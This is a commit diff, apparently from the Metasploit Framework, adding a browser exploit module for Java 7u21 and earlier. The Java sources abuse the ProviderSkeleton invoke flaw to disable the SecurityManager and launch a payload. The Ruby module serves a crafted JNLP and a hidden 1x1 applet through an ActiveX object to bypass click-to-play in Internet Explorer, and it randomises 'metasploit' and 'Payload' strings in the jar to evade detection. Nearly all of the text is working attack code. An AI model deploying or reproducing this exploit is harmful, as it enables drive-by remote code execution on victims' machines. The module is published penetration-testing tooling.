added Java7u21 RCE module

Click2Play bypass doesn't seem to work anymore.

external/source/exploits/provider_skeleton/.classpath

@@ -0,0 +1,7 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<classpath>
+	<classpathentry kind="src" path="src"/>
+	<classpathentry kind="con" path="org.eclipse.jdt.launching.JRE_CONTAINER/org.eclipse.jdt.internal.debug.ui.launcher.StandardVMType/jdk1.7.0_21"/>
+	<classpathentry kind="lib" path="C:/dev/metasploit.jar"/>
+	<classpathentry kind="output" path="bin"/>
+</classpath>

external/source/exploits/provider_skeleton/.project

@@ -0,0 +1,17 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<projectDescription>
+	<name>msf_issue61</name>
+	<comment></comment>
+	<projects>
+	</projects>
+	<buildSpec>
+		<buildCommand>
+			<name>org.eclipse.jdt.core.javabuilder</name>
+			<arguments>
+			</arguments>
+		</buildCommand>
+	</buildSpec>
+	<natures>
+		<nature>org.eclipse.jdt.core.javanature</nature>
+	</natures>
+</projectDescription>

external/source/exploits/provider_skeleton/.settings/org.eclipse.jdt.core.prefs

@@ -0,0 +1,11 @@
+eclipse.preferences.version=1
+org.eclipse.jdt.core.compiler.codegen.inlineJsrBytecode=enabled
+org.eclipse.jdt.core.compiler.codegen.targetPlatform=1.7
+org.eclipse.jdt.core.compiler.codegen.unusedLocal=preserve
+org.eclipse.jdt.core.compiler.compliance=1.7
+org.eclipse.jdt.core.compiler.debug.lineNumber=generate
+org.eclipse.jdt.core.compiler.debug.localVariable=generate
+org.eclipse.jdt.core.compiler.debug.sourceFile=generate
+org.eclipse.jdt.core.compiler.problem.assertIdentifier=error
+org.eclipse.jdt.core.compiler.problem.enumIdentifier=error
+org.eclipse.jdt.core.compiler.source=1.7

external/source/exploits/provider_skeleton/src/DisableSecurityManagerAction.java

@@ -0,0 +1,28 @@
+import java.security.AccessController;
+import java.security.PrivilegedActionException;
+import java.security.PrivilegedExceptionAction;
+
+/**
+ * Class for disabling the SecurityManager.
+ * Based on POC of Security Explorations' Issue 61.
+ * @author mk
+ *
+ */
+public class DisableSecurityManagerAction implements PrivilegedExceptionAction {
+
+	public DisableSecurityManagerAction() {
+		try {
+			AccessController.doPrivileged(this);
+		} catch (PrivilegedActionException e) {
+			// TODO Auto-generated catch block
+			e.printStackTrace();
+		}
+	}
+
+	
+	public Object run() throws Exception {
+		System.setSecurityManager(null);
+		return new Object();
+	}
+
+}

external/source/exploits/provider_skeleton/src/ExpProvider.java

@@ -0,0 +1,12 @@
+import com.sun.tracing.Provider;
+
+/**
+ * Empty interface to get an Provider instance.
+ * Based on POC of Security Explorations' Issue 61.
+ * @author mk
+ *
+ */
+
+public interface ExpProvider extends Provider {
+
+}

external/source/exploits/provider_skeleton/src/Exploit.java

@@ -0,0 +1,118 @@
+import java.applet.Applet;
+import java.io.ByteArrayOutputStream;
+import java.io.InputStream;
+import java.lang.invoke.MethodHandle;
+import java.lang.invoke.MethodHandles;
+import java.lang.invoke.MethodType;
+import java.lang.reflect.InvocationHandler;
+import java.lang.reflect.Method;
+import java.lang.reflect.Proxy;
+
+import metasploit.Payload;
+
+import com.sun.tracing.Provider;
+import com.sun.tracing.ProviderFactory;
+
+/**
+ * Class exploiting the vulnerability in the ProviderSkeleton class. Based on
+ * POC of Security Explorations' Issue 61.
+ * 
+ * @author mk
+ * 
+ */
+
+public class Exploit extends Applet {
+
+	InvocationHandler invoc = null;
+	MethodHandles.Lookup look;
+
+	public Exploit() {
+		try {
+
+			ByteArrayOutputStream classInputStream = new ByteArrayOutputStream();
+			byte[] classBuffer = new byte[8192];
+			int classLength;
+
+			InputStream inputStream = getClass().getResourceAsStream(
+					"DisableSecurityManagerAction.class");
+
+			while ((classLength = inputStream.read(classBuffer)) > 0)
+				classInputStream.write(classBuffer, 0, classLength);
+
+			classBuffer = classInputStream.toByteArray();
+
+			ProviderFactory fac = ProviderFactory.getDefaultFactory();
+			Provider p = fac.createProvider(ExpProvider.class);
+			invoc = Proxy.getInvocationHandler(p);
+			Class handle = java.lang.invoke.MethodHandles.class;
+
+			Method m = handle.getMethod("lookup", new Class[0]);
+			look = (MethodHandles.Lookup) invoc.invoke(null, m, new Object[0]);
+
+			Class context = loadClassUnderPrivContext("sun.org.mozilla.javascript.internal.Context");
+			Class defClassLoader = loadClassUnderPrivContext("sun.org.mozilla.javascript.internal.DefiningClassLoader");
+			Class genClassLoader = loadClassUnderPrivContext("sun.org.mozilla.javascript.internal.GeneratedClassLoader");
+
+			MethodHandle enterMethod = getMethod(context, "enter", context,
+					new Class[0], true);
+
+			Class argTypes[] = new Class[1];
+			argTypes[0] = ClassLoader.class;
+
+			MethodHandle createClassLoader = getMethod(context,
+					"createClassLoader", genClassLoader, argTypes, false);
+
+			argTypes = new Class[2];
+			argTypes[0] = Class.forName("java.lang.String");
+			argTypes[1] = (new byte[0]).getClass();
+
+			MethodHandle defineClass = getMethod(defClassLoader, "defineClass",
+					java.lang.Class.class, argTypes, false);
+
+			Object enterContext = enterMethod.invoke();
+			Object cLoader = createClassLoader.invoke(enterContext, null);
+			Class disabler = (Class) defineClass.invoke(cLoader,
+					"DisableSecurityManagerAction", classBuffer);
+			disabler.newInstance();
+			Payload.main(null);
+
+		} catch (Throwable e) {
+
+		}
+
+	}
+
+	private Class loadClassUnderPrivContext(String className) throws Throwable {
+		Class ret = null;
+
+		Class theClass = java.lang.Class.class;
+
+		Class argTypes[] = new Class[1];
+		argTypes[0] = String.class;
+
+		Method m = theClass.getMethod("forName", argTypes);
+
+		Object argObjects[] = new Object[1];
+		argObjects[0] = className;
+
+		ret = (Class) invoc.invoke(null, m, argObjects);
+
+		return ret;
+	}
+
+	private MethodHandle getMethod(Class c, String methodName,
+			Class returnType, Class argTypes[], boolean isStaticMethod)
+			throws NoSuchMethodException, IllegalAccessException {
+		MethodHandle ret = null;
+
+		MethodType methodType = MethodType.methodType(returnType, argTypes);
+
+		if (isStaticMethod)
+			ret = look.findStatic(c, methodName, methodType);
+		else
+			ret = look.findVirtual(c, methodName, methodType);
+
+		return ret;
+	}
+
+}

modules/exploits/multi/browser/java_jre17_provider_skeleton.rb

@@ -0,0 +1,175 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+#   http://metasploit.com/
+##
+
+require 'msf/core'
+require 'rex'
+
+class Metasploit3 < Msf::Exploit::Remote
+	Rank = ExcellentRanking
+
+	include Msf::Exploit::Remote::HttpServer::HTML
+	include Msf::Exploit::EXE
+
+	include Msf::Exploit::Remote::BrowserAutopwn
+	autopwn_info({ :javascript => false })
+
+	def initialize( info = {} )
+
+		super( update_info( info,
+			'Name'          => 'Java Applet ProviderSkeleton Insecure Invoke Method',
+			'Description'   => %q{
+					This module abuses the insecure invoke() method of the ProviderSkeleton class that
+				allows to call arbitrary static methods with user supplied arguments. The vulnerability
+				affects Java version 7u21 and earlier. This exploit bypasses click-to-play on Internet Explorer
+				and throws a specially crafted JNLP file. This bypass is applicable mainly to IE, where Java
+				Web Start can be launched automatically through the ActiveX control. Otherwise, the
+				applet is launched without click-to-play bypass.
+			},
+			'License'       => MSF_LICENSE,
+			'Author'        =>
+				[
+					'Adam Gowdiak',  # Vulnerability discovery according to Oracle's advisor and also POC
+					'Matthias Kaiser' # Metasploit module
+				],
+			'References'    =>
+				[
+					[ 'URL', 'http://www.security-explorations.com/materials/SE-2012-01-ORACLE-12.pdf' ],
+					[ 'URL', 'http://www.security-explorations.com/materials/se-2012-01-61.zip' ]
+				],
+			'Platform'      => [ 'java', 'win', 'osx', 'linux' ],
+			'Payload'       => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },
+			'Targets'       =>
+				[
+					[ 'Generic (Java Payload)',
+						{
+							'Platform' => ['java'],
+							'Arch' => ARCH_JAVA,
+						}
+					],
+					[ 'Windows x86 (Native Payload)',
+						{
+							'Platform' => 'win',
+							'Arch' => ARCH_X86,
+						}
+					],
+					[ 'Mac OS X x86 (Native Payload)',
+						{
+							'Platform' => 'osx',
+							'Arch' => ARCH_X86,
+						}
+					],
+					[ 'Linux x86 (Native Payload)',
+						{
+							'Platform' => 'linux',
+							'Arch' => ARCH_X86,
+						}
+					],
+				],
+			'DefaultTarget'  => 0,
+			'DisclosureDate' => 'Jun 18 2013'
+		))
+	end
+
+
+	def setup
+		path = File.join(Msf::Config.install_root, "data", "exploits", "provider_skeleton", "Exploit.class")
+		@exploit_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }
+		path = File.join(Msf::Config.install_root, "data", "exploits", "provider_skeleton", "ExpProvider.class")
+		@provider_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }
+		path = File.join(Msf::Config.install_root, "data", "exploits", "provider_skeleton", "DisableSecurityManagerAction.class")
+		@action_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }
+
+		@exploit_class_name = rand_text_alpha("Exploit".length)
+		@exploit_class.gsub!("Exploit", @exploit_class_name)
+
+		@jnlp_name = rand_text_alpha(8)
+
+		super
+	end
+
+	def jnlp_file
+		jnlp_uri = "#{get_uri}/#{@jnlp_name}.jnlp"
+
+		jnlp = %Q|
+<?xml version="1.0" encoding="utf-8"?>
+<jnlp spec="1.0" xmlns:jfx="http://javafx.com" href="#{jnlp_uri}">
+	<information>
+		<title>Applet Test JNLP</title>
+		<vendor>#{rand_text_alpha(8)}</vendor>
+		<description>#{rand_text_alpha(8)}</description>
+		<offline-allowed/>
+	</information>
+
+	<resources>
+		<j2se version="1.7+" href="http://java.sun.com/products/autodl/j2se" />
+		<jar href="#{rand_text_alpha(8)}.jar" main="true" />
+	</resources>
+	<applet-desc name="#{rand_text_alpha(8)}" main-class="#{@exploit_class_name}" width="1" height="1">
+		<param name="__applet_ssv_validated" value="true"></param>
+	</applet-desc>
+	<update check="background"/>
+</jnlp>
+		|
+		return jnlp
+	end
+
+	def on_request_uri(cli, request)
+		print_status("handling request for #{request.uri}")
+
+		case request.uri
+		when /\.jnlp$/i
+			send_response(cli, jnlp_file, { 'Content-Type' => "application/x-java-jnlp-file" })
+		when /\.jar$/i
+			jar = payload.encoded_jar
+			jar.add_file("#{@exploit_class_name}.class", @exploit_class)
+			jar.add_file("ExpProvider.class", @provider_class)
+			jar.add_file("DisableSecurityManagerAction.class", @action_class)
+			metasploit_str = rand_text_alpha("metasploit".length)
+			payload_str = rand_text_alpha("payload".length)
+			jar.entries.each { |entry|
+				entry.name.gsub!("metasploit", metasploit_str)
+				entry.name.gsub!("Payload", payload_str)
+				entry.data = entry.data.gsub("metasploit", metasploit_str)
+				entry.data = entry.data.gsub("Payload", payload_str)
+			}
+			jar.build_manifest
+
+			send_response(cli, jar, { 'Content-Type' => "application/octet-stream" })
+		when /\/$/
+			payload = regenerate_payload(cli)
+			if not payload
+				print_error("Failed to generate the payload.")
+				send_not_found(cli)
+				return
+			end
+			send_response_html(cli, generate_html, { 'Content-Type' => 'text/html' })
+		else
+			send_redirect(cli, get_resource() + '/', '')
+		end
+
+	end
+
+	def generate_html
+		jnlp_uri = "#{get_uri}/#{@jnlp_name}.jnlp"
+
+		# When the browser is IE, the ActvX is used in order to load the malicious JNLP, allowing click2play bypass
+		# Else an <applet> tag is used to load the malicious applet, this time there isn't click2play bypass
+		html = %Q|
+		<html>
+		<body>
+		<object codebase="http://java.sun.com/update/1.6.0/jinstall-6-windows-i586.cab#Version=6,0,0,0" classid="clsid:5852F5ED-8BF4-11D4-A245-0080C6F74284" height=0 width=0>
+		<param name="app" value="#{jnlp_uri}">
+		<param name="back" value="true">
+		<applet archive="#{rand_text_alpha(8)}.jar" code="#{@exploit_class_name}.class" width="1" height="1"></applet>
+		</object>
+		</body>
+		</html>
+		|
+		return html
+	end
+
+end